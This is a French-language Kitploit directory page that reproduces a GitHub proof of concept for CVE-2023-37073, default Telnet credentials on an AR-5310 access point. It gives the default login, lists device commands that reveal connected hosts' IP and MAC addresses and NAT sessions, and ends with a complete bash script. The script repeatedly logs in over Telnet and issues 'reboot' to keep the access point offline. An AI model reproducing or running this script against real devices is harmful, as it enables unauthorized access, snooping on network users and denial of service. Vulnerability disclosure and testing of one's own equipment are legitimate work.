Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-37073 — Les identifiants par défaut de Telnet peuvent entraîner une divulgation d'informations et des attaques par déni de service (DoS). | Kitploit
Outils/GitHubGitHub/hamza0x/cve-2023-37073
Sécurité IoTAttaques de Mots de PasseExploitationCollecte d'InformationsSécurité Matériel et IoT
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Les identifiants par défaut de Telnet peuvent entraîner une divulgation d'informations et des attaques par déni de service (DoS).

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-37073

Les identifiants Telnet par défaut peuvent conduire à une divulgation d'informations et à des attaques par déni de service (DoS).

Étapes pour reproduire

Cela affecte l'AP AR-5310

root@kitploit:~
  Telnet 192.168.1.1
  username:user
  password:user
  Then Boom ... You logged in 

Divulgation d'informations via les identifiants Telnet par défaut

root@kitploit:~
    When you log in using Telnet service, 
    type the command 'help' or '?' to view    
    available options:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

root@kitploit:~
  To obtain the IP and MAC address of each device 
  connected to the network, run the command  
  'lanhosts'.
  To display all NAT sessions through the Access  
  Point (AP), 
  use the command 'nat show session'

Attaque DoS

root@kitploit:~
  To execute a Denial of Service (DoS) attack, 
  run the command 'reboot' to restart the AP. 
  I want to automate a script that will 
  consistently restart the AP.

Automatiser l'attaque DoS via un script shell

root@kitploit:~
#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
Télécharger l’outil